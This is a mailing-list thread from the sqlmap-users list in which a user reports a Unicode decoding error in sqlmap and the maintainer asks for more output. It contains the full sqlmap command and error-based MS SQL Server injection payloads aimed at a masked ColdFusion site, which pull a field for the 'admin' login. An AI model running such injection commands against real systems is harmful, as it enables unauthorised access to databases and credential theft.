Hi,

This how i started sqlmap:

./sqlmap.py -r target.txt -p vulnParameter --sql-query "SELECT value, 
value, value, valueg, value FROM table WHERE value = 'admin'" 
--dbms="microsoft sql server" --risk=2 -v 6

An This is a bit more Output. Decoding Error occures on each request.

And the final output is

SELECT value, value, value, valueg, value FROM table WHERE value = 
'admin' [1]:
[*] None, None, None, None




Traceback (most recent call last):
   File "/usr/lib/python2.6/logging/__init__.py", line 791, in emit
     stream.write(fs % msg.encode("UTF-8"))
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 
9270: ordinal not in range(128)

[15:09:28] [TRAFFIC OUT] HTTP request [#5]:
POST /scripts/XXX/xxx.cfm?CFID=xxxxx&CFTOKEN=xxxxxx HTTP/1.1
Accept-Encoding: identity
Accept-language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) 
Gecko/20100101 Firefox/9.0.1
Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Host: xxxx.xxxxxxxx.com
Referer: 
https://xxxx.xxxxxxxx.com/scripts/xxx/xxx.cfm?start=0&CFID=xxxxx&CFTOKEN=xxxxx
Cookie: CFID=xxxxx; CFTOKEN=xxxxx; SPRACHE=D; CFID=xxxxx; CFTOKEN=xxxxx
Content-type: application/x-www-form-urlencoded
Connection: close

vulnParameter=alle%27%29%20AND%202946%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28104%29%2BCHAR%2858%29%2B%28SELECT%20TOP%201%20SUBSTRING%28%28ISNULL%28CAST%28sSystembezeichnung%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C100%29%20FROM%20Qlogin%20WHERE%20kennung%20%3D%20CHAR%2897%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%28105%29%2BCHAR%28110%29%20AND%20id%20NOT%20IN%20%28SELECT%20TOP%200%20ISNULL%28id%2CCHAR%2832%29%29%20FROM%20Qlogin%20WHERE%20kennung%20%3D%20CHAR%2897%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%28105%29%2BCHAR%28110%29%20ORDER%20BY%20id%29%20ORDER%20BY%20id%29%2BCHAR%2858%29%2BCHAR%28102%29%2BCHAR%28119%29%2BCHAR%28106%29%2BCHAR%2858%29%29%29%20AND%20%28%27hemb%27%3D%27hemb

Traceback (most recent call last):
   File "/usr/lib/python2.6/logging/__init__.py", line 791, in emit
     stream.write(fs % msg.encode("UTF-8"))
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 
9270: ordinal not in range(128)
[15:09:30] [DEBUG] performed 4 queries in 4 seconds
SELECT value, value, value, valueg, value FROM table WHERE value = 
'admin' [1]:
[*] None, None, None, None

[15:09:30] [INFO] Fetched data logged to text files under 
'/home/nso/tools/sqlmap2/sqlmap-dev/output/xxxx.xxxxxxxx.com'

[*] shutting down at 15:09:30

Regards,

Lofi




On Fri, 13 Jan 2012 14:37:19 +0100, Miroslav Stampar wrote:
> Hi.
>
> Could you please send some more details around this lines:
>
> Traceback (most recent call last):
>   File "/usr/lib/python2.6/logging/__init__.py", line 791, in emit
>     stream.write(fs % msg.encode("UTF-8"))
> UnicodeDecodeError: ascii codec cant decode byte 0xc3 in position
> 9270: ordinal not in range(128)
>
> I would need some output from before and after to locate where does 
> it
> happen. This way its impossible to find it.
>
> Kind regards,
> Miroslav Stampar
>
> On Fri, Jan 13, 2012 at 2:05 PM,  wrote:
>
>> Hello,
>>
>> I got this error:
>>
>> Traceback (most recent call last):
>>   File "/usr/lib/python2.6/logging/__init__.py", line 791, in emit
>>     stream.write(fs % msg.encode("UTF-8"))
>> UnicodeDecodeError: ascii codec cant decode byte 0xc3 in position
>> 9270: ordinal not in range(128)
>> [13:58:26] [DEBUG] performed 5 queries in 7 seconds
>> SELECT value, value, value, valueg, value FROM table WHERE value =
>> admin [1]:
>> [*] None, None, None, None, None
>>
>> Injection Type:
>> ---------------
>> ---
>> Place: POST
>> Parameter: vulnParameter
>>     Type: error-based
>>     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or
>> HAVING clause
>>     Payload: vulnParameter=alle) AND
>>
> 
> 9659=CONVERT(INT,(CHAR(58)+CHAR(112)+CHAR(110)+CHAR(101)+CHAR(58)+(SELECT
>> (CASE WHEN (9659=9659) THEN CHAR(49) ELSE CHAR(48)
>> END))+CHAR(58)+CHAR(112)+CHAR(109)+CHAR(116)+CHAR(58))) AND
>> (bVCQ=bVCQ
>> ---
>>
>> Version:
>> --------
>> ./sqlmap.py --version
>>     sqlmap/1.0-dev (r4668) - automatic SQL injection and database
>> takeover tool
>>     http://www.sqlmap.org [1]
>> [*] starting at 13:59:28
>> sqlmap/1.0-dev (r4668)
>> Python 2.6.5
>>
>> Best regards,
>>
>> Lofi
>>
>>
> 
> ------------------------------------------------------------------------------
>> RSA(R) Conference 2012
>> Mar 27 - Feb 2
>> Save $400 by Jan. 27
>> Register now!
>> http://p.sf.net/sfu/rsa-sfdev2dev2 [2]
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net [3]
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users [4]


------------------------------------------------------------------------------
RSA(R) Conference 2012
Mar 27 - Feb 2
Save $400 by Jan. 27
Register now!
http://p.sf.net/sfu/rsa-sfdev2dev2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to